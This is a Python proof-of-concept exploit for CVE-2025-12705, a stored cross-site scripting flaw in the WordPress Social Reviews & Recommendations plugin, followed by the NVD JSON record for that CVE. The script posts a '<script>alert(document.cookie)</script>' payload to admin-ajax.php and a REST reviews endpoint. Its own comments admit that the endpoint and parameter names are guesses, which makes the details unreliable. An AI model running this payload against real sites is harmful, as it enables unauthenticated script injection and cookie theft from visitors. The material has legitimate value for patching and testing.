CVE-2025-12705

import requests # CVE-2025-12705 PoC - Stored XSS in Social Reviews plugin # Target: WordPress site with vulnerable Social Reviews plugin (<=2.5) target_url = "http://target-wordpress-site.com" # XSS payload targeting trim_text function parameters xss_payload = "<script>alert(document.cookie)</script>" # The plugin's trim_text function is called via AJAX or form submission # Attack vector: Inject XSS through review/trim_text parameters def exploit_stored_xss(): """ This PoC demonstrates how an unauthenticated attacker can inject malicious JavaScript through the plugin's vulnerable parameters. """ # Endpoint varies based on plugin configuration endpoints = [ f"{target_url}/wp-admin/admin-ajax.php", f"{target_url}/wp-json/wp/v2/reviews" ] # Payload data that triggers the XSS in trim_text function # The actual parameter names depend on plugin version exploit_data = { "action": "fb_reviews_save_review", "trim_text": xss_payload, "review_text": xss_payload, "source": "facebook" } for endpoint in endpoints: try: response = requests.post(endpoint, data=exploit_data, timeout=10) print(f"[*] Sent payload to {endpoint}") print(f"[*] Response status: {response.status_code}") except requests.RequestException as e: print(f"[!] Request failed: {e}") if __name__ == "__main__": print("CVE-2025-12705 Social Reviews XSS PoC") exploit_stored_xss()

{"cve": {"id": "CVE-2025-12705", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:34.533", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Social Reviews & Recommendations plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in the 'trim_text' function in all versions up to, and including, 2.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability was partially patched in version 2.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/fb-reviews-widget/trunk/includes/class-view.php#L447", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/fb-reviews-widget/trunk/includes/class-view.php#L449", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/fb-reviews-widget/trunk/includes/class-view.php#L452", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3393291/", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3406362/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6d2aa302-aaab-4bf1-9a79-144290b967de?source=cve", "source": "[email protected]"}]}}